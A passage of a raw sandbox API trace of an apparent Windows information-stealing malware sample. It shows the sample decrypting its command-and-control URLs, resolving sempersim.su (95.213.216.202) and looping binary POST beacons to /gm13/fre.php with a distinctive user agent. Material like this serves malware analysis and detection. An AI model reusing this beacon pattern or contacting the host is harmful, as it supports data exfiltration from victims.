hHeap=0x620000) returned 1 [0119.685] GetProcessHeap () returned 0x620000 [0119.685] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0119.685] GetProcessHeap () returned 0x620000 [0119.686] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0119.686] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1254) returned 0x2b0 [0119.688] Sleep (dwMilliseconds=0xea60) [0119.699] GetProcessHeap () returned 0x620000 [0119.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0119.700] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.700] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0119.708] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.709] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0119.719] GetProcessHeap () returned 0x620000 [0119.719] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639068 [0119.720] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.720] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639068*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d7d0) returned 1 [0119.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.721] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0119.721] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.722] CryptSetKeyParam (hKey=0x62d7d0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0119.722] GetProcessHeap () returned 0x620000 [0119.722] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639068 | out: hHeap=0x620000) returned 1 [0119.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.723] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0119.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.724] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0119.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.725] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0119.725] GetProcessHeap () returned 0x620000 [0119.725] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0119.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.725] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0119.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.726] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0119.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.727] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0119.728] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.728] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0119.728] GetProcessHeap () returned 0x620000 [0119.728] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0119.728] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0119.728] GetProcessHeap () returned 0x620000 [0119.729] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0119.732] GetProcessHeap () returned 0x620000 [0119.732] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0119.733] GetProcessHeap () returned 0x620000 [0119.734] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0119.734] GetProcessHeap () returned 0x620000 [0119.734] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643098 [0119.734] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.735] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0119.742] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.742] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0119.751] GetProcessHeap () returned 0x620000 [0119.751] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0119.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.752] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0119.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.753] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0119.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.754] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0119.754] GetProcessHeap () returned 0x620000 [0119.755] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0119.756] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.756] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643098, pdwDataLen=0x19fcfc | out: pbData=0x643098, pdwDataLen=0x19fcfc) returned 1 [0119.757] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.757] CryptDestroyKey (hKey=0x62d190) returned 1 [0119.758] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0119.758] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0119.758] GetProcessHeap () returned 0x620000 [0119.758] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0119.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.759] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0119.760] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.761] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0119.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0119.764] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0119.764] GetProcessHeap () returned 0x620000 [0119.764] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633318 [0119.764] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bf38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0119.766] GetProcessHeap () returned 0x620000 [0119.766] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0119.766] socket (af=2, type=1, protocol=6) returned 0x2b4 [0119.766] connect (s=0x2b4, name=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0119.814] FreeAddrInfoW (pAddrInfo=0x63bf38*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0119.814] GetProcessHeap () returned 0x620000 [0119.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0119.814] GetProcessHeap () returned 0x620000 [0119.814] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0119.815] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0119.816] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0119.816] GetProcessHeap () returned 0x620000 [0119.816] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x636288 [0119.816] GetProcessHeap () returned 0x620000 [0119.817] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0119.817] GetProcessHeap () returned 0x620000 [0119.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643050 [0119.817] GetProcessHeap () returned 0x620000 [0119.817] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0119.818] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0119.819] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0119.819] GetProcessHeap () returned 0x620000 [0119.819] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x636340 [0119.819] GetProcessHeap () returned 0x620000 [0119.820] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0119.820] send (s=0x2b4, buf=0x636340*, len=237, flags=0) returned 237 [0119.821] send (s=0x2b4, buf=0x6421e0*, len=159, flags=0) returned 159 [0119.821] GetProcessHeap () returned 0x620000 [0119.821] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0119.821] recv (in: s=0x2b4, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0121.344] GetProcessHeap () returned 0x620000 [0121.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636340 | out: hHeap=0x620000) returned 1 [0121.345] GetProcessHeap () returned 0x620000 [0121.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0121.345] GetProcessHeap () returned 0x620000 [0121.345] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x636288 | out: hHeap=0x620000) returned 1 [0121.345] GetProcessHeap () returned 0x620000 [0121.346] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0121.346] closesocket (s=0x2b4) returned 0 [0121.347] GetProcessHeap () returned 0x620000 [0121.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0121.347] GetProcessHeap () returned 0x620000 [0121.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0121.347] GetProcessHeap () returned 0x620000 [0121.347] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643098 | out: hHeap=0x620000) returned 1 [0121.347] GetProcessHeap () returned 0x620000 [0121.348] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633318 | out: hHeap=0x620000) returned 1 [0121.348] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x124c) returned 0x2b4 [0121.350] Sleep (dwMilliseconds=0xea60) [0121.356] GetProcessHeap () returned 0x620000 [0121.356] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6430e0 [0121.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.357] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0121.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.365] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0121.376] GetProcessHeap () returned 0x620000 [0121.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0121.377] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.377] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0121.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.378] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0121.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.379] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0121.379] GetProcessHeap () returned 0x620000 [0121.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fa8 | out: hHeap=0x620000) returned 1 [0121.381] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.381] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6430e0, pdwDataLen=0x19fcfc | out: pbData=0x6430e0, pdwDataLen=0x19fcfc) returned 1 [0121.382] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.382] CryptDestroyKey (hKey=0x62d710) returned 1 [0121.383] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.383] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0121.383] GetProcessHeap () returned 0x620000 [0121.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0121.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.384] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0121.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.388] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0121.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.389] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0121.390] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.390] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0121.390] GetProcessHeap () returned 0x620000 [0121.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0121.390] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0121.390] GetProcessHeap () returned 0x620000 [0121.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0121.391] GetProcessHeap () returned 0x620000 [0121.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0121.391] GetProcessHeap () returned 0x620000 [0121.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0121.391] GetProcessHeap () returned 0x620000 [0121.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642fc0 [0121.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.392] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0121.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.398] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0121.407] GetProcessHeap () returned 0x620000 [0121.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0121.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.409] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0121.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.410] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0121.410] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.411] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0121.411] GetProcessHeap () returned 0x620000 [0121.411] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0121.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.412] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642fc0, pdwDataLen=0x19fcfc | out: pbData=0x642fc0, pdwDataLen=0x19fcfc) returned 1 [0121.413] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.413] CryptDestroyKey (hKey=0x62d710) returned 1 [0121.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0121.414] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0121.414] GetProcessHeap () returned 0x620000 [0121.414] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x635b58 [0121.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.416] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0121.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.421] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0121.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0121.422] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0121.422] GetProcessHeap () returned 0x620000 [0121.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0121.422] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0121.425] GetProcessHeap () returned 0x620000 [0121.425] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0121.425] socket (af=2, type=1, protocol=6) returned 0x2b8 [0121.425] connect (s=0x2b8, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0121.477] FreeAddrInfoW (pAddrInfo=0x63c118*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0121.477] GetProcessHeap () returned 0x620000 [0121.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0121.477] GetProcessHeap () returned 0x620000 [0121.477] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x644560 [0121.478] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0121.478] wvsprintfA (in: param_1=0x644560, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0121.479] GetProcessHeap () returned 0x620000 [0121.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x628a78 [0121.479] GetProcessHeap () returned 0x620000 [0121.479] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0121.479] GetProcessHeap () returned 0x620000 [0121.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6434d0 [0121.479] GetProcessHeap () returned 0x620000 [0121.479] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x644560 [0121.480] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0121.481] wvsprintfA (in: param_1=0x644560, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0121.481] GetProcessHeap () returned 0x620000 [0121.481] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x628b30 [0121.481] GetProcessHeap () returned 0x620000 [0121.482] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644560 | out: hHeap=0x620000) returned 1 [0121.482] send (s=0x2b8, buf=0x628b30*, len=237, flags=0) returned 237 [0121.482] send (s=0x2b8, buf=0x6421e0*, len=159, flags=0) returned 159 [0121.483] GetProcessHeap () returned 0x620000 [0121.483] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x644560 [0121.483] recv (in: s=0x2b8, buf=0x644560, len=4048, flags=0 | out: buf=0x644560*) returned 237 [0123.229] GetProcessHeap () returned 0x620000 [0123.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628b30 | out: hHeap=0x620000) returned 1 [0123.229] GetProcessHeap () returned 0x620000 [0123.229] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6434d0 | out: hHeap=0x620000) returned 1 [0123.229] GetProcessHeap () returned 0x620000 [0123.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x628a78 | out: hHeap=0x620000) returned 1 [0123.230] GetProcessHeap () returned 0x620000 [0123.230] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0123.230] closesocket (s=0x2b8) returned 0 [0123.231] GetProcessHeap () returned 0x620000 [0123.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0123.231] GetProcessHeap () returned 0x620000 [0123.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x635b58 | out: hHeap=0x620000) returned 1 [0123.231] GetProcessHeap () returned 0x620000 [0123.231] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642fc0 | out: hHeap=0x620000) returned 1 [0123.232] GetProcessHeap () returned 0x620000 [0123.232] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0123.240] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x644560, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xba8) returned 0x2b8 [0123.245] Sleep (dwMilliseconds=0xea60) [0123.266] GetProcessHeap () returned 0x620000 [0123.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643368 [0123.267] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.267] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0123.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.279] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0123.287] GetProcessHeap () returned 0x620000 [0123.287] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638fa8 [0123.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0123.288] CryptImportKey (in: hProv=0x63ba08, pbData=0x638fa8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0123.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 